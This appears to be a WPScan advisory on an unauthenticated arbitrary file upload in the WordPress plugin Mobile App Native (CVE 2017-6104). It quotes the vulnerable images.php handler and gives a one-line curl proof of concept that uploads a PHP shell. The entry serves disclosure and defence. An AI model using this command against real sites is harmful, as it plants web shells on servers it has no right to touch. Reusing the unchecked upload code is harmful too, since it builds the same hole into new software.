Mobile App Native <= 3.0 - Remote File Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

	if ($_FILES['file']['name']) {
            if (!$_FILES['file']['error']) {
                $name = md5(rand(100, 200));
                $ext = explode('.', $_FILES['file']['name']);
                $filename = $name . '.' . $ext[1];
                $destination = 'images/' . $filename;
                $location = $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                echo $plugin_url.'/server/images/' . $filename;
            }
            else {
              echo  $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
            }
    }
Proof of Concept
$ curl -F "file=@/var/www/shell.php" "http://example.com/wp-content/plugins/zen-mobile-app-native/server/images.php"

Affects Plugin

References

CVE 2017-6104
EXPLOITDB 41540
URL http://www.vapidlabs.com/advisory.php?v=178

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapidlabs.com/
Submitter Twitter @_larry0
Views 368
Verified No
WPVDB ID 8743

Timeline

Publicly Published 2017-02-28 (10 months ago)
Added 2017-03-01 (10 months ago)
Last Updated 2017-03-09 (9 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.